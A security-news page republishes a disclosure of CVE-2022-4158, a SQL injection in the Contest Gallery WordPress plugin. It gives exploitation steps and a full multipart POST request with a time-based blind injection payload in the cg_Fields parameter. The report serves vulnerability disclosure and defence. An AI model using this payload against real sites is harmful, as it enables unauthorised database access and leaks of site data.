Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-4158: Security Bulletin

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_Fields POST parameter before concatenating it to an SQL query in users-registry-check-registering-and-login.php. This may allow malicious visitors to leak sensitive information from the site’s database.

CVE
Open in Source
#sql#vulnerability#ubuntu#linux#wordpress#php#firefox

contest-gallery 19.1.4.1 (15/15) WordPress plug-in SQL injection****Vulnerability Metadata

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4158

CVSS 3.x Base Score

x

CVSS 2.0 Base Score

x

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

[email protected]

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4158

Vulnerability Description

The MULTIPART cg_Fields POST query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An attacker with no privileges can abuse the User Registration functionality in users-registry-check-registering-and-login.php. This leads to a threat actor crafting a malicious POST request.

Exploitation Guide

Note: In some cases, the line number mentioned in description text, above the image can be different from the image shown below it. This change is due to lines of code wrapping, which is done to represent long lines of code in the image. The description text represents the actual line number in the application.

Create a New Gallery, if no gallery was created before.

Change the Gallery name.

Add the shortcode cg_users_reg id="1". Note: id should be the id of any active the gallery.

Registration form is visible to anyone vising the page.

Fill the form with sample data, and click Register.

Clicking Register triggers the vulnerable request.

The request needs to be modified by modifying the values of MULTIPART POST parameter cg_Fields[1][Form_Input_ID] and cg_Fields[1][Field_Type].

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of cg_Fields at line 33 in ./v10/v10-admin/users/frontend/registry/users-registry-check-registering-and-login.php.

Subsequently, value of parameter cg_Fields[1][Form_Input_ID] is assigned to $Form_Input_ID.

At line 183 in ./v10/v10-admin/users/frontend/registry/users-registry-check-registering-and-login.php database query call on $Form_Input_ID leads to SQL Injection.

Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------22204028416237992052154109961
Content-Length: 3796
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/?p=1
Cookie: wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_current_page_id"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_check"

63e2eac15c3548881b7e582f807cb491fc9b8c0cb7a61631580a8db22fa29d70
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="action"

post_cg_registry
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_gallery_id_registry"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Form_Input_ID]"

1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Type]"

user-check-agreement-field                  
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Order]"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Form_Input_ID]"

2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Type]"

main-nick-name
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Order]"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Form_Input_ID]"

3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Type]"

main-mail
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Order]"

2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Content]"

[email protected]
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Form_Input_ID]"

4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Type]"

password
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Order]"

3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Form_Input_ID]"

5
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Type]"

password-confirm
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Order]"

4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-mail"

[email protected]
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-user-name"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-nick-name"

testing
-----------------------------22204028416237992052154109961--

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE